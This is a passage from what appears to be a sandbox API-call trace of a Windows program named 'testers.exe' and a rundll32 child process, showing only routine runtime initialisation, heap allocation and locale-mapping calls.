"c:\\windows\\system32")) returned 1 [0275.156] mciSendStringW (in: lpstrCommand="close all", lpstrReturnString=0x0, uReturnLength=0x0, hwndCallback=0x0 | out: lpstrReturnString=0x0) returned 0x0 [0275.157] OleUninitialize () Thread: id = 313 os_tid = 0x218 Thread: id = 314 os_tid = 0x500 Thread: id = 315 os_tid = 0x6d8 Thread: id = 316 os_tid = 0x35c Thread: id = 318 os_tid = 0x6e0 Thread: id = 320 os_tid = 0x7f8 Thread: id = 321 os_tid = 0x364 Thread: id = 322 os_tid = 0x6b8 Process: id = "44" image_name = "rundll32.exe" filename = "c:\\windows\\syswow64\\rundll32.exe" page_root = "0x5e138000" os_pid = "0x6e4" os_integrity_level = "0x1000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "43" os_parent_pid = "0x67c" cmd_line = "\"C:\\Windows\\system32\\rundll32.exe\" \"C:\\Windows\\syswow64\\WININET.dll\",DispatchAPICall 1 " cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e39d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 317 os_tid = 0x5dc Thread: id = 319 os_tid = 0x5cc Thread: id = 323 os_tid = 0x250 Thread: id = 324 os_tid = 0x61c Thread: id = 325 os_tid = 0x1d0 Thread: id = 326 os_tid = 0x6cc Process: id = "45" image_name = "testers.exe" filename = "c:\\progra~2\\common~1\\testers.exe" page_root = "0x5ce22000" os_pid = "0x57c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "43" os_parent_pid = "0x67c" cmd_line = "C:\\PROGRA~2\\COMMON~1\\testers.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e39d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 357 os_tid = 0xb0 [0276.759] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x77fce0 | out: lpSystemTimeAsFileTime=0x77fce0*(dwLowDateTime=0x45b143f0, dwHighDateTime=0x1d661be)) [0276.759] GetCurrentThreadId () returned 0xb0 [0276.759] GetCurrentProcessId () returned 0x57c [0276.759] QueryPerformanceCounter (in: lpPerformanceCount=0x77fcd8 | out: lpPerformanceCount=0x77fcd8*=20728509331) returned 1 [0276.790] GetStartupInfoW (in: lpStartupInfo=0x77fc70 | out: lpStartupInfo=0x77fc70*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\PROGRA~2\\COMMON~1\\testers.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x7737fd35, hStdError=0x773e7daf)) [0276.790] GetProcessHeap () returned 0x850000 [0276.791] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75990000 [0276.791] GetProcAddress (hModule=0x75990000, lpProcName="FlsAlloc") returned 0x759a4f2b [0276.791] GetProcAddress (hModule=0x75990000, lpProcName="FlsFree") returned 0x759a359f [0276.791] GetProcAddress (hModule=0x75990000, lpProcName="FlsGetValue") returned 0x759a1252 [0276.791] GetProcAddress (hModule=0x75990000, lpProcName="FlsSetValue") returned 0x759a4208 [0276.791] GetProcAddress (hModule=0x75990000, lpProcName="InitializeCriticalSectionEx") returned 0x759a4d28 [0276.791] GetProcAddress (hModule=0x75990000, lpProcName="CreateEventExW") returned 0x75a2410b [0276.792] GetProcAddress (hModule=0x75990000, lpProcName="CreateSemaphoreExW") returned 0x75a24195 [0276.792] GetProcAddress (hModule=0x75990000, lpProcName="SetThreadStackGuarantee") returned 0x759ad31f [0276.792] GetProcAddress (hModule=0x75990000, lpProcName="CreateThreadpoolTimer") returned 0x759bee7e [0276.792] GetProcAddress (hModule=0x75990000, lpProcName="SetThreadpoolTimer") returned 0x773a441c [0276.792] GetProcAddress (hModule=0x75990000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x773cc50e [0276.792] GetProcAddress (hModule=0x75990000, lpProcName="CloseThreadpoolTimer") returned 0x773cc381 [0276.792] GetProcAddress (hModule=0x75990000, lpProcName="CreateThreadpoolWait") returned 0x759bf088 [0276.792] GetProcAddress (hModule=0x75990000, lpProcName="SetThreadpoolWait") returned 0x773b05d7 [0276.793] GetProcAddress (hModule=0x75990000, lpProcName="CloseThreadpoolWait") returned 0x773cca24 [0276.793] GetProcAddress (hModule=0x75990000, lpProcName="FlushProcessWriteBuffers") returned 0x77380b8c [0276.793] GetProcAddress (hModule=0x75990000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7743fde8 [0276.793] GetProcAddress (hModule=0x75990000, lpProcName="GetCurrentProcessorNumber") returned 0x773d1e1d [0276.793] GetProcAddress (hModule=0x75990000, lpProcName="GetLogicalProcessorInformation") returned 0x75a24761 [0276.793] GetProcAddress (hModule=0x75990000, lpProcName="CreateSymbolicLinkW") returned 0x75a1cd11 [0276.793] GetProcAddress (hModule=0x75990000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0276.793] GetProcAddress (hModule=0x75990000, lpProcName="EnumSystemLocalesEx") returned 0x75a2424f [0276.793] GetProcAddress (hModule=0x75990000, lpProcName="CompareStringEx") returned 0x75a246b1 [0276.794] GetProcAddress (hModule=0x75990000, lpProcName="GetDateFormatEx") returned 0x75a36676 [0276.794] GetProcAddress (hModule=0x75990000, lpProcName="GetLocaleInfoEx") returned 0x75a24751 [0276.794] GetProcAddress (hModule=0x75990000, lpProcName="GetTimeFormatEx") returned 0x75a365f1 [0276.794] GetProcAddress (hModule=0x75990000, lpProcName="GetUserDefaultLocaleName") returned 0x75a247c1 [0276.794] GetProcAddress (hModule=0x75990000, lpProcName="IsValidLocaleName") returned 0x75a247e1 [0276.794] GetProcAddress (hModule=0x75990000, lpProcName="LCMapStringEx") returned 0x75a247f1 [0276.794] GetProcAddress (hModule=0x75990000, lpProcName="GetCurrentPackageId") returned 0x0 [0276.794] GetProcAddress (hModule=0x75990000, lpProcName="GetTickCount64") returned 0x759beee0 [0276.794] GetProcAddress (hModule=0x75990000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0276.794] GetProcAddress (hModule=0x75990000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0276.795] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x3bc) returned 0x871f08 [0276.795] GetCurrentThreadId () returned 0xb0 [0276.795] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x18) returned 0x862a08 [0276.795] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x800) returned 0x8722d0 [0276.795] GetStartupInfoW (in: lpStartupInfo=0x77fc40 | out: lpStartupInfo=0x77fc40*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\PROGRA~2\\COMMON~1\\testers.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x2b9d0d, hStdOutput=0x97e4d459, hStdError=0x0)) [0276.795] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0276.795] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0276.795] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0276.795] GetCommandLineW () returned="C:\\PROGRA~2\\COMMON~1\\testers.exe" [0276.795] GetEnvironmentStringsW () returned 0x872ad8* [0276.795] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xaca) returned 0x8735b0 [0276.796] FreeEnvironmentStringsW (penv=0x872ad8) returned 1 [0276.796] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x354ba8, nSize=0x104 | out: lpFilename="C:\\PROGRA~2\\COMMON~1\\testers.exe" (normalized: "c:\\progra~2\\common~1\\testers.exe")) returned 0x20 [0276.796] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4a) returned 0x862a28 [0276.796] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x98) returned 0x872ad8 [0276.796] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x3e) returned 0x862120 [0276.796] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x6c) returned 0x872b78 [0276.796] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x6e) returned 0x872bf0 [0276.796] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x78) returned 0x85f860 [0276.796] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x62) returned 0x872c68 [0276.796] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x2e) returned 0x86c588 [0276.796] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x48) returned 0x8681a0 [0276.796] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x28) returned 0x86bfe0 [0276.796] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x1a) returned 0x86fb20 [0276.796] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x4a) returned 0x872cd8 [0276.796] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x72) returned 0x85f8e0 [0276.796] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x30) returned 0x86c5c0 [0276.796] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x2e) returned 0x86c5f8 [0276.796] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x1c) returned 0x86fb48 [0276.796] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0xd2) returned 0x872d30 [0276.796] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x7c) returned 0x872e10 [0276.796] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x36) returned 0x872e98 [0276.796] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x3a) returned 0x862168 [0276.796] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x90) returned 0x872ed8 [0276.796] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x24) returned 0x86c010 [0276.796] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x30) returned 0x86c630 [0276.796] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x36) returned 0x872f70 [0276.796] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x48) returned 0x8681f0 [0276.796] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x52) returned 0x872fb0 [0276.796] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x3c) returned 0x8621b0 [0276.796] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x82) returned 0x873010 [0276.796] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x2e) returned 0x86c668 [0276.796] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x1e) returned 0x86fb70 [0276.796] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x2c) returned 0x86c6a0 [0276.796] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x54) returned 0x8740a0 [0276.796] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x52) returned 0x874100 [0276.796] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x2a) returned 0x86c6d8 [0276.797] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x3c) returned 0x8621f8 [0276.797] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x54) returned 0x874160 [0276.797] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x24) returned 0x86c040 [0276.797] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x30) returned 0x86c710 [0276.797] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x8c) returned 0x8730a0 [0276.797] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8735b0 | out: hHeap=0x850000) returned 1 [0276.797] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x80) returned 0x873138 [0276.797] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x8, Size=0x800) returned 0x8731c0 [0276.797] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0276.797] GetLastError () returned 0x0 [0276.797] SetLastError (dwErrCode=0x0) [0276.797] GetLastError () returned 0x0 [0276.797] SetLastError (dwErrCode=0x0) [0276.797] GetLastError () returned 0x0 [0276.798] SetLastError (dwErrCode=0x0) [0276.798] GetACP () returned 0x4e4 [0276.798] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x220) returned 0x8739c8 [0276.798] GetLastError () returned 0x0 [0276.798] SetLastError (dwErrCode=0x0) [0276.798] IsValidCodePage (CodePage=0x4e4) returned 1 [0276.798] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x77fc34 | out: lpCPInfo=0x77fc34) returned 1 [0276.798] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x77f6fc | out: lpCPInfo=0x77f6fc) returned 1 [0276.798] GetLastError () returned 0x0 [0276.798] SetLastError (dwErrCode=0x0) [0276.798] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x77fb10, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0276.798] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x77fb10, cbMultiByte=256, lpWideCharStr=0x77f478, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0276.798] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpCharType=0x77f710 | out: lpCharType=0x77f710) returned 1 [0276.798] GetLastError () returned 0x0 [0276.798] SetLastError (dwErrCode=0x0) [0276.798] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x77fb10, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0276.798] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x77fb10, cbMultiByte=256, lpWideCharStr=0x77f448, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0276.798] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0276.798] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x77f238, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0276.798] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x77fa10, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿéÔä\x97Lüw", lpUsedDefaultChar=0x0) returned 256 [0276.798] GetLastError () returned 0x0 [0276.798] SetLastError (dwErrCode=0x0) [0276.798] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x77fb10, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0276.798] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x77fb10, cbMultiByte=256, lpWideCharStr=0x77f468, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ+Ā") returned 256 [0276.798] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ+Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0276.798] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ+Ā", cchSrc=256, lpDestStr=0x77f258, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0276.798] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x77f910, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f 